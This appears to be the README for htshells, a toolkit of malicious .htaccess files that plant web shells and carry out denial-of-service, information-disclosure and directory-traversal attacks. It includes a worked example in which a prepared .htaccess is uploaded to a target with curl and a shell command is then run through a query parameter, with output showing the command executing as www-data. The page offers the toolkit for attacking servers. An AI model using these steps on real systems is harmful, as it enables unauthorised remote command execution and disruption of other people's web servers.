Home

Awesome

HTSHELLS - Self contained web shells and other attacks via .htaccess files.

Attacks are named in the following fashion, module.attack.htaccess and grouped by attack type in directories. Pick the one you need and copy it to a new file named .htaccess, check the file to see if it needs editing before you upload it. Web shells executes commands from the query parameter c, unless the file states otherwise.

To prepare run ./prepare.sh file which will generate the .htaccess file to be uploaded. Example:

$ ./prepare.sh shell/mod_php.shell.htaccess
┬ ┬┌┬┐┌─┐┬ ┬┌─┐┬  ┬  ┌─┐
├─┤ │ └─┐├─┤├┤ │  │  └─┐
┴ ┴ ┴ └─┘┴ ┴└─┘┴─┘┴─┘└─┘
 justanotherhacker.com

.htaccess file is ready
$ curl -F 'file=@.htaccess' -k https://target/upload.php
$ curl -k https://target/uploads/.htaccess?c=id
...
# uid=33(www-data) gid=33(www-data) groups=33(www-data)

== DOS/ # Denial of service attacks

== INFO/ # Information disclosure attacks

== SHELL/ # Interactive command execution

== TRAVERSAL/ # Directory traversal attacks

== ./ # Various attacks

Wireghoul - http://www.justanotherhacker.com